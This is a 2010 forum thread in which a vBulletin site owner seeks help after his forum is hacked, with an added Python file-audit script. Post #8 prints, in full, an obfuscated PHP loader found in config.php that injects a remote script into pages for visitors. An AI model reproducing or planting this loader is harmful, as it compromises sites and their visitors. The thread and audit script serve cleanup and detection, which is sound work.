#1
05-07-2010, 01:07 PM
nkmsw8
HELP...My forum has been infected with a virus

I have been running this forum for about two years now and early this morning I was notified that I had a virus or that my forum was hacked. The website is floridaconcealedcarry.com/Forum/index.php.

I can't log in to it and don't know where to start as far as correcting this. I was set to upgrade to the new 4.0 software in a few days and so this is devastating for me.

Thanks

#2
05-07-2010, 01:24 PM
borbole

Quote (originally posted by nkmsw8):
> I have been running this forum for about two years now and early this morning I was notified that I had a virus or that my forum was hacked. The website is *** removed live link ***
>
> I can't log in to it and don't know where to start as far as correcting this. I was set to upgrade to the new 4.0 software in a few days and so this is devastating for me.
>
> Thanks

First off, I would advise anyone against clicking the link to the infected forum for security reasons.

That said, try to do a clean up of all your vb files by overwriting them with a fresh set from the vb package, your version. Then do another thorough checkup of all your server space and database and if everything is ok upgrade to the latest version. Also change all the passwords for your admin, ftp, cp etc. And last but not least, inform your host about this so they can check their logs and see how exactly they got in.

#3
05-07-2010, 01:28 PM
Lynne

Can you ftp to your site? If so, replace all the files with totally default files and remove any non-vbulletin files.

Have you talked to your host? They may be able to help figure out how this happened.

#4
05-07-2010, 01:29 PM
nkmsw8

Thanks for the advice. I will be doing these things now.

--------------- Added [DATE]1273245301[/DATE] at [TIME]1273245301[/TIME] ---------------

I have gone ahead and changed my ftp password but I cannot access my CP or Admin. I will download the entire site from the server onto my computer in a secure sandbox. However, how can I save the user data from these files? My oldest backup is weeks old.

Thanks.

#5
05-07-2010, 02:19 PM
borbole

Quote (originally posted by nkmsw8):
> Thanks for the advice. I will be doing these things now.
>
> --------------- Added [DATE]1273245301[/DATE] at [TIME]1273245301[/TIME] ---------------
>
> I have gone ahead and changed my ftp password but I cannot access my CP or Admin. I will download the entire site from the server onto my computer in a secure sandbox. However, how can I save the user data from these files? My oldest backup is weeks old.
>
> Thanks.

That data is stored in the db and not in the php files. Try to clean them up as suggested above and see if it would help.

#6
05-07-2010, 07:22 PM
nkmsw8

Thanks for all your help. The forum is now back up and running. I re-installed all the PHP files and that took care of the problem.

Thanks

#7
05-07-2010, 07:29 PM
borbole

Quote (originally posted by nkmsw8):
> Thanks for all your help. The forum is now back up and running. I re-installed all the PHP files and that took care of the problem.
>
> Thanks

Glad to hear that. Did you also upgrade to the latest version? Also don't forget to inform your host about it so they can investigate things on their end as well.

#8
05-07-2010, 10:58 PM
nkmsw8

I was digging around in my config.php file while changing the db password and I found this code at the top of the file.

Quote:
<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl 9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsg ICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl 9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9l eGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgIC AgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FH RU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVk VSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAg ICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y2 1NOUltaDBkSEE2THk5cGJtUmxjMmxuYm5OMGRXUnBiMmx1Wm04 dVkyOXRMMnh6TG5Cb2NDSStQQzl6WTNKcGNIUSsiKTsgICAgIC B9ICAgICAgcmV0dXJuICIiOyAgICAgfSAgICB9ICAgICAgICBp ZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXsgICAgIG Z1bmN0aW9uIGd6ZGVjb2RlKCRSNUE5Q0YxQjQ5NzUwMkFDQTIz QzhGNjExQTU2NDY4NEMpeyAgICAgICRSMzBCMkFCOERDMTQ5Nk QwNkIyMzBBNzFEODk2MkFGNUQ9QG9yZChAc3Vic3RyKCRSNUE5 Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMywxKSk7IC AgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFE OT0xMDsgICAgICAkUkEzRDUyRTUyQTQ4OTM2Q0RFMEY1MzU2Qk IwODY1MkYyPTA7ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2 QjIzMEE3MUQ4OTYyQUY1RCY0KXsgICAgICAgJFI2M0JFREU2Qj E5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj1AdW5wYWNrKCd2Jyxz dWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Nj g0QywxMCwyKSk7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZF QUQwN0E0RDkxRTI5RUI9JFI2M0JFREU2QjE5MjY2RDRFRkVBRD A3QTREOTFFMjlFQlsxXTsgICAgICAgJFJCRTRDNEQwMzdFOTM5 MjI2RjY1ODEyODg1QTUzREFEOSs9MiskUjYzQkVERTZCMTkyNj ZENEVGRUFEMDdBNEQ5MUUyOUVCOyAgICAgIH0gICAgICBpZigk UjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjgpey AgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNE QUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MT FBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1 ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzME IyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYxNil7ICAg ICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRD k9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1 NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MT I4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJB QjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjIpeyAgICAgIC 
AkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0y OyAgICAgIH0gICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OU ExODIyREEzMzUzPUBnemluZmxhdGUoQHN1YnN0cigkUjVBOUNG MUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLCRSQkU0QzREMD M3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKTsgICAgICBpZigk UjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPT09Rk FMU0UpeyAgICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUEx ODIyREEzMzUzPSRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQT U2NDY4NEM7ICAgICAgfSAgICAgIHJldHVybiAkUjAzNEFFMkFC OTRGOTlDQzgxQjM4OUExODIyREEzMzUzOyAgICAgfSAgICB9IC AgIGZ1bmN0aW9uIG1yb2JoKCRSRTgyRUU5QjEyMUY3MDk4OTVF RjU0RUJBN0ZBNkI3OEIpeyAgICAgSGVhZGVyKCdDb250ZW50LU VuY29kaW5nOiBub25lJyk7ICAgICAkUkExNzlBQkQzQTdCOUUy OEMzNjlGN0I1OUM1MUI4MURFPWd6ZGVjb2RlKCRSRTgyRUU5Qj EyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpOyAgICAgICBpZihw cmVnX21hdGNoKCcvXDxcL2JvZHkvc2knLCRSQTE3OUFCRDNBN0 I5RTI4QzM2OUY3QjU5QzUxQjgxREUpKXsgICAgICByZXR1cm4g cHJlZ19yZXBsYWNlKCcvKFw8XC9ib2R5W15cPl0qXD4pL3NpJy xnbWwoKS4iXG4iLickMScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5 RjdCNTlDNTFCODFERSk7ICAgICB9ZWxzZXsgICAgICByZXR1cm 4gJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERS5n bWwoKTsgICAgIH0gICAgfSAgICBvYl9zdGFydCgnbXJv"));?>
Should this be there?

#9
05-07-2010, 11:21 PM
borbole

Quote (originally posted by nkmsw8):
> I was digging around in my config.php file while changing the db password and I found this code at the top of the file.
>
> Should this be there?

No, that code should be deleted. If I were you I would also check thoroughly my server space for anything out of the ordinary. It would be best if you checked all the other .php non vb files that you might have. Like for example from another script like WordPress, etc.
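
A file audit along the lines suggested in posts #2, #3 and #9, as an added example that is not part of the original thread: it compares a downloaded copy of the site against a pristine package tree and flags PHP files that carry the `eval(base64_decode(` loader shape shown in post #8, that differ from the shipped file, or that are not in the package at all. The directory layout and file contents are constructed sample data, and `audit`, `build_sample` and `demo` are hypothetical names.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Loader shape from post #8: <?php /**/ eval(base64_decode("...
INJECT_RE = re.compile(rb"eval\s*\(\s*base64_decode\s*\(", re.I)

def sha256(path):
    return hashlib.sha256(path.read_bytes()).hexdigest()

def audit(live_root, clean_root):
    """Compare a downloaded copy of the site against a pristine package tree."""
    live_root, clean_root = Path(live_root), Path(clean_root)
    report = {"injected": [], "modified": [], "extra": []}
    for f in sorted(live_root.rglob("*.php")):
        rel = f.relative_to(live_root).as_posix()
        if INJECT_RE.search(f.read_bytes()):
            report["injected"].append(rel)   # carries the eval/base64 loader
        ref = clean_root / rel
        if not ref.is_file():
            report["extra"].append(rel)      # not shipped in the package
        elif sha256(f) != sha256(ref):
            report["modified"].append(rel)   # differs from the shipped file
    return report

def build_sample(base):
    """Constructed sample trees (not real vBulletin files)."""
    clean, live = base / "clean", base / "live"
    stock = b"<?php\n// stock file\n"
    loader = b'<?php /**/ eval(base64_decode("QUJD"));?>'  # placeholder blob
    for root in (clean, live):
        (root / "includes").mkdir(parents=True)
        (root / "index.php").write_bytes(stock)
        (root / "includes" / "functions.php").write_bytes(stock)
    # Tampered stock file, site-specific config with the loader, unrelated script
    (live / "includes" / "functions.php").write_bytes(loader + stock)
    (live / "includes" / "config.php").write_bytes(loader + b"<?php\n$config = array();\n")
    (live / "blog.php").write_bytes(b"<?php\n// other script\n")
    return live, clean

def demo():
    with tempfile.TemporaryDirectory() as tmp:
        return audit(*build_sample(Path(tmp)))

if __name__ == "__main__":
    for kind, files in demo().items():
        print(kind, files)
```

Files reported as extra are not replaced by re-uploading the package, so each one has to be reviewed by hand.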

#10
05-07-2010, 11:31 PM
nkmsw8

Will do. Thanks :up:

--------------- Added [DATE]1273286835[/DATE] at [TIME]1273286835[/TIME] ---------------

How many different places in the vBulletin software do you have to update the db password when it's changed on the db server? I'm getting a db error after I updated the password on the db and the config.php file.

All times are GMT.